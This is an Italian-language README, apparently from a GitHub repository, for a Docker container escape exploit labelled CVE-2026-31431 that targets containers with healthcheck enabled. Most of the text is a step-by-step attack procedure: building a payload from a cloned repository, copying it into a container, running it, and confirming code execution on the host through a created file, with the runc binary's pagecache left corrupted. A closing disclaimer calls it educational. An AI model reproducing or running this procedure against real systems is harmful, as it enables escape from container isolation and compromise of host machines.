
# Evasione del container su qualsiasi container Docker con healthcheck abilitato tramite CVE-2026-31431
https://github.com/user-attachments/assets/2cb0cb67-789a-4461-a0b8-1fe878d9426e
In questo repository, docker-compose.yml è fornito per configurare un container vulnerabile. Puoi anche usare qualsiasi altro container vulnerabile o configurarne uno tuo, ma ricorda di modificare il codice dell'exploit di conseguenza.
# Sulla macchina host
rm -r copy-fail-c /tmp/pwned
docker-compose up -d
git clone https://github.com/tgies/copy-fail-c.git
cp payload.c copy-fail-c/
cd copy-fail-c && make && cp exploit ../ && cd ..
docker cp exp.sh copyfail:/tmp/
docker cp exploit copyfail:/tmp/
docker exec -it copyfail /bin/sh
# Dentro il container copyfail
cd /tmp
chmod +x exp.sh exploit
./exp.sh
# Attendi qualche minuto affinché l'healthcheck venga eseguito
# e verifica se /tmp/pwned viene creato sull'host
# Sulla macchina host
ls /tmp/pwned
Una volta che l'exploit ha successo, la pagecache del binario runc sulla macchina host viene corrotta. Puoi ripristinarla eseguendo echo 3 | sudo tee /proc/sys/vm/drop_caches sull'host.
Questo repository è solo a scopo educativo. Non deve essere utilizzato per attività dannose. L'autore non è responsabile per eventuali danni causati dall'uso improprio di questo codice. Usalo sempre in un ambiente controllato e legale.